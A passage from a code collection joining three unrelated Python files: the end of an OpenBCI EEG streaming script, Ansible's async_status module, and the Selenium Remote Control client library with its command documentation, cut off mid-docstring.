1: print "time", tick, ": paquet skipped!" if sample.id == 255: last_id = -1 else: last_id = sample.id # update counters global nb_samples_in, nb_samples_out nb_samples_in = nb_samples_in + 1 # check for duplication, by default 1 (...which is *no* duplication of the one current sample) global leftover_duplications # first method with sampling rate and elapsed time (depends on system clock accuracy) if (SAMPLING_RATE > 0): # elapsed time since last call, update tick now = timeit.default_timer() elapsed_time = now - tick; # now we have to compute how many times we should send data to keep up with sample rate (oversampling) leftover_duplications = SAMPLING_RATE * elapsed_time + leftover_duplications - 1 tick = now # second method with a samplin factor (depends on openbci accuracy) elif SAMPLING_FACTOR > 0: leftover_duplications = SAMPLING_FACTOR + leftover_duplications - 1 #print "needed_duplications: ", needed_duplications, "leftover_duplications: ", leftover_duplications # If we need to insert values, will interpolate between current packet and last one # FIXME: ok, at the moment because we do packet per packet treatment, only handles nb_duplications == 1 for more interpolation is bad and sends nothing if (leftover_duplications > 1): leftover_duplications = leftover_duplications - 1 interpol_values = list(last_values) for i in range(0,len(interpol_values)): # OK, it's a very rough interpolation interpol_values[i] = (last_values[i] + sample.channel_data[i]) / 2 if DEBUG: print " --" print " last values: ", last_values print " interpolation: ", interpol_values print " current sample: ", sample.channel_data # send to clients interpolated sample #leftover_duplications = 0 server.broadcast_values(interpol_values) nb_samples_out = nb_samples_out + 1 # send to clients current sample server.broadcast_values(sample.channel_data) nb_samples_out = nb_samples_out + 1 # save current values for possible interpolation last_values = list(sample.channel_data) if __name__ == 
'__main__': # init server server = streamer_tcp_server.StreamerTCPServer(ip=SERVER_IP, port=SERVER_PORT, nb_channels=NB_CHANNELS) # init board port = '/dev/ttyUSB1' baud = 115200 monit = Monitor() # daemonize theard to terminate it altogether with the main when time will come monit.daemon = True monit.start() board = bci.OpenBCIBoard(port=port, baud=baud, filter_data=False) board.startStreaming(streamData)
sgerhart/ansible
refs/heads/maintenance_policy_module
lib/ansible/modules/utilities/logic/async_status.py
19
#!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>, and others # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['stableinterface'], 'supported_by': 'core'} DOCUMENTATION = ''' --- module: async_status short_description: Obtain status of asynchronous task description: - This module gets the status of an asynchronous task. - This module is also supported for Windows targets. version_added: "0.5" options: jid: description: - Job or task identifier required: true mode: description: - if C(status), obtain the status; if C(cleanup), clean up the async job cache (by default in C(~/.ansible_async/)) for the specified job I(jid). choices: [ "status", "cleanup" ] default: "status" notes: - See also U(https://docs.ansible.com/playbooks_async.html) - This module is also supported for Windows targets. 
author: - "Ansible Core Team" - "Michael DeHaan" ''' import json import os from ansible.module_utils._text import to_native from ansible.module_utils.basic import AnsibleModule from ansible.module_utils.six import iteritems def main(): module = AnsibleModule(argument_spec=dict( jid=dict(required=True), mode=dict(default='status', choices=['status', 'cleanup']), # passed in from the async_status action plugin _async_dir=dict(required=True, type='path'), )) mode = module.params['mode'] jid = module.params['jid'] async_dir = module.params['_async_dir'] # setup logging directory logdir = os.path.expanduser(async_dir) log_path = os.path.join(logdir, jid) if not os.path.exists(log_path): module.fail_json(msg="could not find job", ansible_job_id=jid, started=1, finished=1) if mode == 'cleanup': os.unlink(log_path) module.exit_json(ansible_job_id=jid, erased=log_path) # NOT in cleanup mode, assume regular status mode # no remote kill mode currently exists, but probably should # consider log_path + ".pid" file and also unlink that above data = None try: data = open(log_path).read() data = json.loads(data) except Exception: if not data: # file not written yet? That means it is running module.exit_json(results_file=log_path, ansible_job_id=jid, started=1, finished=0) else: module.fail_json(ansible_job_id=jid, results_file=log_path, msg="Could not parse job output: %s" % data, started=1, finished=1) if 'started' not in data: data['finished'] = 1 data['ansible_job_id'] = jid elif 'finished' not in data: data['finished'] = 0 # Fix error: TypeError: exit_json() keywords must be strings data = dict([(to_native(k), v) for k, v in iteritems(data)]) module.exit_json(**data) if __name__ == '__main__': main()
wilxsv/sinam
refs/heads/master
symfony/web/assets/js/OpenLayers-2.13.1/tests/selenium/remotecontrol/selenium.py
254
""" Copyright 2006 ThoughtWorks, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ __docformat__ = "restructuredtext en" # This file has been automatically generated via XSL import httplib import urllib import re class selenium: """ Defines an object that runs Selenium commands. Element Locators ~~~~~~~~~~~~~~~~ Element Locators tell Selenium which HTML element a command refers to. The format of a locator is: \ *locatorType*\ **=**\ \ *argument* We support the following strategies for locating elements: * \ **identifier**\ =\ *id*: Select the element with the specified @id attribute. If no match is found, select the first element whose @name attribute is \ *id*. (This is normally the default; see below.) * \ **id**\ =\ *id*: Select the element with the specified @id attribute. * \ **name**\ =\ *name*: Select the first element with the specified @name attribute. * username * name=username The name may optionally be followed by one or more \ *element-filters*, separated from the name by whitespace. If the \ *filterType* is not specified, \ **value**\ is assumed. * name=flavour value=chocolate * \ **dom**\ =\ *javascriptExpression*: Find an element by evaluating the specified string. This allows you to traverse the HTML Document Object Model using JavaScript. Note that you must not return a value in this string; simply make it the last expression in the block. 
* dom=document.forms['myForm'].myDropdown * dom=document.images[56] * dom=function foo() { return document.links[1]; }; foo(); * \ **xpath**\ =\ *xpathExpression*: Locate an element using an XPath expression. * xpath=//img[@alt='The image alt text'] * xpath=//table[@id='table1']//tr[4]/td[2] * xpath=//a[contains(@href,'#id1')] * xpath=//a[contains(@href,'#id1')]/@class * xpath=(//table[@class='stylee'])//th[text()='theHeaderText']/../td * xpath=//input[@name='name2' and @value='yes'] * xpath=//\*[text()="right"] * \ **link**\ =\ *textPattern*: Select the link (anchor) element which contains text matching the specified \ *pattern*. * link=The link text * \ **css**\ =\ *cssSelectorSyntax*: Select the element using css selectors. Please refer to CSS2 selectors, CSS3 selectors for more information. You can also check the TestCssLocators test in the selenium test suite for an example of usage, which is included in the downloaded selenium core package. * css=a[href="#id3"] * css=span#firstChild + span Currently the css selector locator supports all css1, css2 and css3 selectors except namespace in css3, some pseudo classes(:nth-of-type, :nth-last-of-type, :first-of-type, :last-of-type, :only-of-type, :visited, :hover, :active, :focus, :indeterminate) and pseudo elements(::first-line, ::first-letter, ::selection, ::before, ::after). Without an explicit locator prefix, Selenium uses the following default strategies: * \ **dom**\ , for locators starting with "document." * \ **xpath**\ , for locators starting with "//" * \ **identifier**\ , otherwise Element Filters ~~~~~~~~~~~~~~~ Element filters can be used with a locator to refine a list of candidate elements. They are currently used only in the 'name' element-locator. Filters look much like locators, ie. \ *filterType*\ **=**\ \ *argument* Supported element-filters are: \ **value=**\ \ *valuePattern* Matches elements based on their values. This is particularly useful for refining a list of similarly-named toggle-buttons. 
\ **index=**\ \ *index* Selects a single element based on its position in the list (offset from zero). String-match Patterns ~~~~~~~~~~~~~~~~~~~~~ Various Pattern syntaxes are available for matching string values: * \ **glob:**\ \ *pattern*: Match a string against a "glob" (aka "wildmat") pattern. "Glob" is a kind of limited regular-expression syntax typically used in command-line shells. In a glob pattern, "\*" represents any sequence of characters, and "?" represents any single character. Glob patterns match against the entire string. * \ **regexp:**\ \ *regexp*: Match a string using a regular-expression. The full power of JavaScript regular-expressions is available. * \ **regexpi:**\ \ *regexpi*: Match a string using a case-insensitive regular-expression. * \ **exact:**\ \ *string*: Match a string exactly, verbatim, without any of that fancy wildcard stuff. If no pattern prefix is specified, Selenium assumes that it's a "glob" pattern. For commands that return multiple values (such as verifySelectOptions), the string being matched is a comma-separated list of the return values, where both commas and backslashes in the values are backslash-escaped. When providing a pattern, the optional matching syntax (i.e. glob, regexp, etc.) is specified once, as usual, at the beginning of the pattern. 
""" ### This part is hard-coded in the XSL def __init__(self, host, port, browserStartCommand, browserURL): self.host = host self.port = port self.browserStartCommand = browserStartCommand self.browserURL = browserURL self.sessionId = None def start(self): result = self.get_string("getNewBrowserSession", [self.browserStartCommand, self.browserURL]) try: self.sessionId = result except ValueError: raise Exception, result def stop(self): self.do_command("testComplete", []) self.sessionId = None def do_command(self, verb, args): conn = httplib.HTTPConnection(self.host, self.port) commandString = u'/selenium-server/driver/?cmd=' + urllib.quote_plus(unicode(verb).encode('utf-8')) for i in range(len(args)): commandString = commandString + '&' + unicode(i+1) + '=' + urllib.quote_plus(unicode(args[i]).encode('utf-8')) if (None != self.sessionId): commandString = commandString + "&sessionId=" + unicode(self.sessionId) conn.request("GET", commandString) response = conn.getresponse() #print response.status, response.reason data = unicode(response.read(), "UTF-8") result = response.reason #print "Selenium Result: " + repr(data) + "\n\n" if (not data.startswith('OK')): raise Exception, data return data def get_string(self, verb, args): result = self.do_command(verb, args) return result[3:] def get_string_array(self, verb, args): csv = self.get_string(verb, args) token = "" tokens = [] escape = False for i in range(len(csv)): letter = csv[i] if (escape): token = token + letter escape = False continue if (letter == '\\'): escape = True elif (letter == ','): tokens.append(token) token = "" else: token = token + letter tokens.append(token) return tokens def get_number(self, verb, args): # Is there something I need to do here? return self.get_string(verb, args) def get_number_array(self, verb, args): # Is there something I need to do here? 
return self.get_string_array(verb, args) def get_boolean(self, verb, args): boolstr = self.get_string(verb, args) if ("true" == boolstr): return True if ("false" == boolstr): return False raise ValueError, "result is neither 'true' nor 'false': " + boolstr def get_boolean_array(self, verb, args): boolarr = self.get_string_array(verb, args) for i in range(len(boolarr)): if ("true" == boolstr): boolarr[i] = True continue if ("false" == boolstr): boolarr[i] = False continue raise ValueError, "result is neither 'true' nor 'false': " + boolarr[i] return boolarr ### From here on, everything's auto-generated from XML def click(self,locator): """ Clicks on a link, button, checkbox or radio button. If the click action causes a new page to load (like a link usually does), call waitForPageToLoad. 'locator' is an element locator """ self.do_command("click", [locator,]) def double_click(self,locator): """ Double clicks on a link, button, checkbox or radio button. If the double click action causes a new page to load (like a link usually does), call waitForPageToLoad. 'locator' is an element locator """ self.do_command("doubleClick", [locator,]) def context_menu(self,locator): """ Simulates opening the context menu for the specified element (as might happen if the user "right-clicked" on the element). 'locator' is an element locator """ self.do_command("contextMenu", [locator,]) def click_at(self,locator,coordString): """ Clicks on a link, button, checkbox or radio button. If the click action causes a new page to load (like a link usually does), call waitForPageToLoad. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("clickAt", [locator,coordString,]) def double_click_at(self,locator,coordString): """ Doubleclicks on a link, button, checkbox or radio button. If the action causes a new page to load (like a link usually does), call waitForPageToLoad. 
'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("doubleClickAt", [locator,coordString,]) def context_menu_at(self,locator,coordString): """ Simulates opening the context menu for the specified element (as might happen if the user "right-clicked" on the element). 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("contextMenuAt", [locator,coordString,]) def fire_event(self,locator,eventName): """ Explicitly simulate an event, to trigger the corresponding "on\ *event*" handler. 'locator' is an element locator 'eventName' is the event name, e.g. "focus" or "blur" """ self.do_command("fireEvent", [locator,eventName,]) def focus(self,locator): """ Move the focus to the specified element; for example, if the element is an input field, move the cursor to that field. 'locator' is an element locator """ self.do_command("focus", [locator,]) def key_press(self,locator,keySequence): """ Simulates a user pressing and releasing a key. 'locator' is an element locator 'keySequence' is Either be a string("\" followed by the numeric keycode of the key to be pressed, normally the ASCII value of that key), or a single character. For example: "w", "\119". """ self.do_command("keyPress", [locator,keySequence,]) def shift_key_down(self): """ Press the shift key and hold it down until doShiftUp() is called or a new page is loaded. """ self.do_command("shiftKeyDown", []) def shift_key_up(self): """ Release the shift key. """ self.do_command("shiftKeyUp", []) def meta_key_down(self): """ Press the meta key and hold it down until doMetaUp() is called or a new page is loaded. """ self.do_command("metaKeyDown", []) def meta_key_up(self): """ Release the meta key. 
""" self.do_command("metaKeyUp", []) def alt_key_down(self): """ Press the alt key and hold it down until doAltUp() is called or a new page is loaded. """ self.do_command("altKeyDown", []) def alt_key_up(self): """ Release the alt key. """ self.do_command("altKeyUp", []) def control_key_down(self): """ Press the control key and hold it down until doControlUp() is called or a new page is loaded. """ self.do_command("controlKeyDown", []) def control_key_up(self): """ Release the control key. """ self.do_command("controlKeyUp", []) def key_down(self,locator,keySequence): """ Simulates a user pressing a key (without releasing it yet). 'locator' is an element locator 'keySequence' is Either be a string("\" followed by the numeric keycode of the key to be pressed, normally the ASCII value of that key), or a single character. For example: "w", "\119". """ self.do_command("keyDown", [locator,keySequence,]) def key_up(self,locator,keySequence): """ Simulates a user releasing a key. 'locator' is an element locator 'keySequence' is Either be a string("\" followed by the numeric keycode of the key to be pressed, normally the ASCII value of that key), or a single character. For example: "w", "\119". """ self.do_command("keyUp", [locator,keySequence,]) def mouse_over(self,locator): """ Simulates a user hovering a mouse over the specified element. 'locator' is an element locator """ self.do_command("mouseOver", [locator,]) def mouse_out(self,locator): """ Simulates a user moving the mouse pointer away from the specified element. 'locator' is an element locator """ self.do_command("mouseOut", [locator,]) def mouse_down(self,locator): """ Simulates a user pressing the mouse button (without releasing it yet) on the specified element. 'locator' is an element locator """ self.do_command("mouseDown", [locator,]) def mouse_down_at(self,locator,coordString): """ Simulates a user pressing the mouse button (without releasing it yet) at the specified location. 
'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("mouseDownAt", [locator,coordString,]) def mouse_up(self,locator): """ Simulates the event that occurs when the user releases the mouse button (i.e., stops holding the button down) on the specified element. 'locator' is an element locator """ self.do_command("mouseUp", [locator,]) def mouse_up_at(self,locator,coordString): """ Simulates the event that occurs when the user releases the mouse button (i.e., stops holding the button down) at the specified location. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("mouseUpAt", [locator,coordString,]) def mouse_move(self,locator): """ Simulates a user pressing the mouse button (without releasing it yet) on the specified element. 'locator' is an element locator """ self.do_command("mouseMove", [locator,]) def mouse_move_at(self,locator,coordString): """ Simulates a user pressing the mouse button (without releasing it yet) on the specified element. 'locator' is an element locator 'coordString' is specifies the x,y position (i.e. - 10,20) of the mouse event relative to the element returned by the locator. """ self.do_command("mouseMoveAt", [locator,coordString,]) def type(self,locator,value): """ Sets the value of an input field, as though you typed it in. Can also be used to set the value of combo boxes, check boxes, etc. In these cases, value should be the value of the option selected, not the visible text. 'locator' is an element locator 'value' is the value to type """ self.do_command("type", [locator,value,]) def type_keys(self,locator,value): """ Simulates keystroke events on the specified element, as though you typed the value key-by-key. 
This is a convenience method for calling keyDown, keyUp, keyPress for every character in the specified string; this is useful for dynamic UI widgets (like auto-completing combo boxes) that require explicit key events. Unlike the simple "type" command, which forces the specified value into the page directly, this command may or may not have any visible effect, even in cases where typing keys would normally have a visible effect. For example, if you use "typeKeys" on a form element, you may or may not see the results of what you typed in the field. In some cases, you may need to use the simple "type" command to set the value of the field and then the "typeKeys" command to send the keystroke events corresponding to what you just typed. 'locator' is an element locator 'value' is the value to type """ self.do_command("typeKeys", [locator,value,]) def set_speed(self,value): """ Set execution speed (i.e., set the millisecond length of a delay which will follow each selenium operation). By default, there is no such delay, i.e., the delay is 0 milliseconds. 'value' is the number of milliseconds to pause after operation """ self.do_command("setSpeed", [value,]) def get_speed(self): """ Get execution speed (i.e., get the millisecond length of the delay following each selenium operation). By default, there is no such delay, i.e., the delay is 0 milliseconds. See also setSpeed. """ return self.get_string("getSpeed", []) def check(self,locator): """ Check a toggle-button (checkbox/radio) 'locator' is an element locator """ self.do_command("check", [locator,]) def uncheck(self,locator): """ Uncheck a toggle-button (checkbox/radio) 'locator' is an element locator """ self.do_command("uncheck", [locator,]) def select(self,selectLocator,optionLocator): """ Select an option from a drop-down using an option locator. Option locators provide different ways of specifying options of an HTML Select element (e.g. 
for selecting a specific option, or for asserting that the selected option satisfies a specification). There are several forms of Select Option Locator. * \ **label**\ =\ *labelPattern*: matches options based on their labels, i.e. the visible text. (This is the default.) * label=regexp:^[Oo]ther * \ **value**\ =\ *valuePattern*: matches options based on their values. * value=other * \ **id**\ =\ *id*: matches options based on their ids. * id=option1 * \ **index**\ =\ *index*: matches an option based on its index (offset from zero). * index=2 If no option locator prefix is provided, the default behaviour is to match on \ **label**\ . 'selectLocator' is an element locator identifying a drop-down menu 'optionLocator' is an option locator (a label by default) """ self.do_command("select", [selectLocator,optionLocator,]) def add_selection(self,locator,optionLocator): """ Add a selection to the set of selected options in a multi-select element using an option locator. @see #doSelect for details of option locators 'locator' is an element locator identifying a multi-select box 'optionLocator' is an option locator (a label by default) """ self.do_command("addSelection", [locator,optionLocator,]) def remove_selection(self,locator,optionLocator): """ Remove a selection from the set of selected options in a multi-select element using an option locator. @see #doSelect for details of option locators 'locator' is an element locator identifying a multi-select box 'optionLocator' is an option locator (a label by default) """ self.do_command("removeSelection", [locator,optionLocator,]) def remove_all_selections(self,locator): """ Unselects all of the selected options in a multi-select element. 'locator' is an element locator identifying a multi-select box """ self.do_command("removeAllSelections", [locator,]) def submit(self,formLocator): """ Submit the specified form. This is particularly useful for forms without submit buttons, e.g. single-input "Search" forms. 
'formLocator' is an element locator for the form you want to submit """ self.do_command("submit", [formLocator,]) def open(self,url): """ Opens an URL in the test frame. This accepts both relative and absolute URLs. The "open" command waits for the page to load before proceeding, ie. the "AndWait" suffix is implicit. \ *Note*: The URL must be on the same domain as the runner HTML due to security restrictions in the browser (Same Origin Policy). If you need to open an URL on another domain, use the Selenium Server to start a new browser session on that domain. 'url' is the URL to open; may be relative or absolute """ self.do_command("open", [url,]) def open_window(self,url,windowID): """ Opens a popup window (if a window with that ID isn't already open). After opening the window, you'll need to select it using the selectWindow command. This command can also be a useful workaround for bug SEL-339. In some cases, Selenium will be unable to intercept a call to window.open (if the call occurs during or before the "onLoad" event, for example). In those cases, you can force Selenium to notice the open window's name by using the Selenium openWindow command, using an empty (blank) url, like this: openWindow("", "myFunnyWindow"). 'url' is the URL to open, which can be blank 'windowID' is the JavaScript window ID of the window to select """ self.do_command("openWindow", [url,windowID,]) def select_window(self,windowID): """ Selects a popup window using a window locator; once a popup window has been selected, all commands go to that window. To select the main window again, use null as the target. Window locators provide different ways of specifying the window object: by title, by internal JavaScript "name," or by JavaScript variable. * \ **title**\ =\ *My Special Window*: Finds the window using the text that appears in the title bar. Be careful; two windows can share the same title. If that happens, this locator will just pick one. 
* \ **name**\ =\ *myWindow*: Finds the window using its internal JavaScript "name" property. This is the second parameter "windowName" passed to the JavaScript method window.open(url, windowName, windowFeatures, replaceFlag) (which Selenium intercepts). * \ **var**\ =\ *variableName*: Some pop-up windows are unnamed (anonymous), but are associated with a JavaScript variable name in the current application window, e.g. "window.foo = window.open(url);". In those cases, you can open the window using "var=foo". If no window locator prefix is provided, we'll try to guess what you mean like this: 1.) if windowID is null, (or the string "null") then it is assumed the user is referring to the original window instantiated by the browser). 2.) if the value of the "windowID" parameter is a JavaScript variable name in the current application window, then it is assumed that this variable contains the return value from a call to the JavaScript window.open() method. 3.) Otherwise, selenium looks in a hash it maintains that maps string names to window "names". 4.) If \ *that* fails, we'll try looping over all of the known windows to try to find the appropriate "title". Since "title" is not necessarily unique, this may have unexpected behavior. If you're having trouble figuring out the name of a window that you want to manipulate, look at the Selenium log messages which identify the names of windows created via window.open (and therefore intercepted by Selenium). You will see messages like the following for each window as it is opened: ``debug: window.open call intercepted; window ID (which you can use with selectWindow()) is "myNewWindow"`` In some cases, Selenium will be unable to intercept a call to window.open (if the call occurs during or before the "onLoad" event, for example). (This is bug SEL-339.) 
In those cases, you can force Selenium to notice the open window's name by using the Selenium openWindow command, using an empty (blank) url, like this: openWindow("", "myFunnyWindow"). 'windowID' is the JavaScript window ID of the window to select """ self.do_command("selectWindow", [windowID,]) def select_frame(self,locator): """ Selects a frame within the current window. (You may invoke this command multiple times to select nested frames.) To select the parent frame, use "relative=parent" as a locator; to select the top frame, use "relative=top". You can also select a frame by its 0-based index number; select the first frame with "index=0", or the third frame with "index=2". You may also use a DOM expression to identify the frame you want directly, like this: ``dom=frames["main"].frames["subframe"]`` 'locator' is an element locator identifying a frame or iframe """ self.do_command("selectFrame", [locator,]) def get_whether_this_frame_match_frame_expression(self,currentFrameString,target): """ Determine whether current/locator identify the frame containing this running code. This is useful in proxy injection mode, where this code runs in every browser frame and window, and sometimes the selenium server needs to identify the "current" frame. In this case, when the test calls selectFrame, this routine is called for each frame to figure out which one has been selected. The selected frame will return true, while all others will return false. 'currentFrameString' is starting frame 'target' is new frame (which might be relative to the current one) """ return self.get_boolean("getWhetherThisFrameMatchFrameExpression", [currentFrameString,target,]) def get_whether_this_window_match_window_expression(self,currentWindowString,target): """ Determine whether currentWindowString plus target identify the window containing this running code. 
This is useful in proxy injection mode, where this code runs in every browser frame and window, and sometimes the selenium server needs to identify the "current" window. In this case, when the test calls selectWindow, this routine is called for each window to figure out which one has been selected. The selected window will return true, while all others will return false. 'currentWindowString' is starting window 'target' is new window (which might be relative to the current one, e.g., "_parent") """ return self.get_boolean("getWhetherThisWindowMatchWindowExpression", [currentWindowString,target,]) def wait_for_pop_up(self,windowID,timeout): """ Waits for a popup window to appear and load up. 'windowID' is the JavaScript window "name" of the window that will appear (not the text of the title bar) 'timeout' is a timeout in milliseconds, after which the action will return with an error """ self.do_command("waitForPopUp", [windowID,timeout,]) def choose_cancel_on_next_confirmation(self): """ By default, Selenium's overridden window.confirm() function will return true, as if the user had manually clicked OK; after running this command, the next call to confirm() will return false, as if the user had clicked Cancel. Selenium will then resume using the default behavior for future confirmations, automatically returning true (OK) unless/until you explicitly call this command for each confirmation. """ self.do_command("chooseCancelOnNextConfirmation", []) def choose_ok_on_next_confirmation(self): """ Undo the effect of calling chooseCancelOnNextConfirmation. Note that Selenium's overridden window.confirm() function will normally automatically return true, as if the user had manually clicked OK, so you shouldn't need to use this command unless for some reason you need to change your mind prior to the next confirmation. 
After any confirmation, Selenium will resume using the default behavior for future confirmations, automatically returning true (OK) unless/until you explicitly call chooseCancelOnNextConfirmation for each confirmation. """ self.do_command("chooseOkOnNextConfirmation", []) def answer_on_next_prompt(self,answer): """ Instructs Selenium to return the specified answer string in response to the next JavaScript prompt [window.prompt()]. 'answer' is the answer to give in response to the prompt pop-up """ self.do_command("answerOnNextPrompt", [answer,]) def go_back(self): """ Simulates the user clicking the "back" button on their browser. """ self.do_command("goBack", []) def refresh(self): """ Simulates the user clicking the "Refresh" button on their browser. """ self.do_command("refresh", []) def close(self): """ Simulates the user clicking the "close" button in the titlebar of a popup window or tab. """ self.do_command("close", []) def is_alert_present(self): """ Has an alert occurred? This function never throws an exception """ return self.get_boolean("isAlertPresent", []) def is_prompt_present(self): """ Has a prompt occurred? This function never throws an exception """ return self.get_boolean("isPromptPresent", []) def is_confirmation_present(self): """ Has confirm() been called? This function never throws an exception """ return self.get_boolean("isConfirmationPresent", []) def get_alert(self): """ Retrieves the message of a JavaScript alert generated during the previous action, or fail if there were no alerts. Getting an alert has the same effect as manually clicking OK. If an alert is generated but you do not get/verify it, the next Selenium action will fail. NOTE: under Selenium, JavaScript alerts will NOT pop up a visible alert dialog. NOTE: Selenium does NOT support JavaScript alerts that are generated in a page's onload() event handler. In this case a visible dialog WILL be generated and Selenium will hang until someone manually clicks OK. 
""" return self.get_string("getAlert", []) def get_confirmation(self): """ Retrieves the message of a JavaScript confirmation dialog generated during the previous action. By default, the confirm function will return true, having the same effect as manually clicking OK. This can be changed by prior execution of the chooseCancelOnNextConfirmation command. If an confirmation is generated but you do not get/verify it, the next Selenium action will fail. NOTE: under Selenium, JavaScript confirmations will NOT pop up a visible dialog. NOTE: Selenium does NOT support JavaScript confirmations that are generated in a page's onload() event handler. In this case a visible dialog WILL be generated and Selenium will hang until you manually click OK. """ return self.get_string("getConfirmation", []) def get_prompt(self): """ Retrieves the message of a JavaScript question prompt dialog generated during the previous action. Successful handling of the prompt requires prior execution of the answerOnNextPrompt command. If a prompt is generated but you do not get/verify it, the next Selenium action will fail. NOTE: under Selenium, JavaScript prompts will NOT pop up a visible dialog. NOTE: Selenium does NOT support JavaScript prompts that are generated in a page's onload() event handler. In this case a visible dialog WILL be generated and Selenium will hang until someone manually clicks OK. """ return self.get_string("getPrompt", []) def get_location(self): """ Gets the absolute URL of the current page. """ return self.get_string("getLocation", []) def get_title(self): """ Gets the title of the current page. """ return self.get_string("getTitle", []) def get_body_text(self): """ Gets the entire text of the page. """ return self.get_string("getBodyText", []) def get_value(self,locator): """ Gets the (whitespace-trimmed) value of an input field (or anything else with a value parameter). 
For checkbox/radio elements, the value will be "on" or "off" depending on whether the element is checked or not. 'locator' is an element locator """ return self.get_string("getValue", [locator,]) def get_text(self,locator): """ Gets the text of an element. This works for any element that contains text. This command uses either the textContent (Mozilla-like browsers) or the innerText (IE-like browsers) of the element, which is the rendered text shown to the user. 'locator' is an element locator """ return self.get_string("getText", [locator,]) def highlight(self,locator): """ Briefly changes the backgroundColor of the specified element yellow. Useful for debugging. 'locator' is an element locator """ self.do_command("highlight", [locator,]) def get_eval(self,script): """ Gets the result of evaluating the specified JavaScript snippet. The snippet may have multiple lines, but only the result of the last line will be returned. Note that, by default, the snippet will run in the context of the "selenium" object itself, so ``this`` will refer to the Selenium object. Use ``window`` to refer to the window of your application, e.g. ``window.document.getElementById('foo')`` If you need to use a locator to refer to a single element in your application page, you can use ``this.browserbot.findElement("id=foo")`` where "id=foo" is your locator. 'script' is the JavaScript snippet to run """ return self.get_string("getEval", [script,]) def is_checked(self,locator): """ Gets whether a toggle-button (checkbox/radio) is checked. Fails if the specified element doesn't exist or isn't a toggle-button. 'locator' is an element locator pointing to a checkbox or radio button """ return self.get_boolean("isChecked", [locator,]) def get_table(self,tableCellAddress): """ Gets the text from a cell of a table. The cellAddress syntax tableLocator.row.column, where row and column start at 0. 'tableCellAddress' is a cell address, e.g. 
"foo.1.4" """ return self.get_string("getTable", [tableCellAddress,]) def get_selected_labels(self,selectLocator): """ Gets all option labels (visible text) for selected options in the specified select or multi-select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedLabels", [selectLocator,]) def get_selected_label(self,selectLocator): """ Gets option label (visible text) for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedLabel", [selectLocator,]) def get_selected_values(self,selectLocator): """ Gets all option values (value attributes) for selected options in the specified select or multi-select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedValues", [selectLocator,]) def get_selected_value(self,selectLocator): """ Gets option value (value attribute) for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedValue", [selectLocator,]) def get_selected_indexes(self,selectLocator): """ Gets all option indexes (option number, starting at 0) for selected options in the specified select or multi-select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedIndexes", [selectLocator,]) def get_selected_index(self,selectLocator): """ Gets option index (option number, starting at 0) for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedIndex", [selectLocator,]) def get_selected_ids(self,selectLocator): """ Gets all option element IDs for selected options in the specified select or multi-select element. 
'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectedIds", [selectLocator,]) def get_selected_id(self,selectLocator): """ Gets option element ID for selected option in the specified select element. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string("getSelectedId", [selectLocator,]) def is_something_selected(self,selectLocator): """ Determines whether some option in a drop-down menu is selected. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_boolean("isSomethingSelected", [selectLocator,]) def get_select_options(self,selectLocator): """ Gets all option labels in the specified select drop-down. 'selectLocator' is an element locator identifying a drop-down menu """ return self.get_string_array("getSelectOptions", [selectLocator,]) def get_attribute(self,attributeLocator): """ Gets the value of an element attribute. The value of the attribute may differ across browsers (this is the case for the "style" attribute, for example). 'attributeLocator' is an element locator followed by an @ sign and then the name of the attribute, e.g. "foo@bar" """ return self.get_string("getAttribute", [attributeLocator,]) def is_text_present(self,pattern): """ Verifies that the specified text pattern appears somewhere on the rendered page shown to the user. 'pattern' is a pattern to match with the text of the page """ return self.get_boolean("isTextPresent", [pattern,]) def is_element_present(self,locator): """ Verifies that the specified element is somewhere on the page. 'locator' is an element locator """ return self.get_boolean("isElementPresent", [locator,]) def is_visible(self,locator): """ Determines if the specified element is visible. An element can be rendered invisible by setting the CSS "visibility" property to "hidden", or the "display" property to "none", either for the element itself or one if its ancestors. 
This method will fail if the element is not present. 'locator' is an element locator """ return self.get_boolean("isVisible", [locator,]) def is_editable(self,locator): """ Determines whether the specified input element is editable, ie hasn't been disabled. This method will fail if the specified element isn't an input element. 'locator' is an element locator """ return self.get_boolean("isEditable", [locator,]) def get_all_buttons(self): """ Returns the IDs of all buttons on the page. If a given button has no ID, it will appear as "" in this array. """ return self.get_string_array("getAllButtons", []) def get_all_links(self): """ Returns the IDs of all links on the page. If a given link has no ID, it will appear as "" in this array. """ return self.get_string_array("getAllLinks", []) def get_all_fields(self): """ Returns the IDs of all input fields on the page. If a given field has no ID, it will appear as "" in this array. """ return self.get_string_array("getAllFields", []) def get_attribute_from_all_windows(self,attributeName): """ Returns every instance of some attribute from all known windows. 'attributeName' is name of an attribute on the windows """ return self.get_string_array("getAttributeFromAllWindows", [attributeName,]) def dragdrop(self,locator,movementsString): """ deprecated - use dragAndDrop instead 'locator' is an element locator 'movementsString' is offset in pixels from the current location to 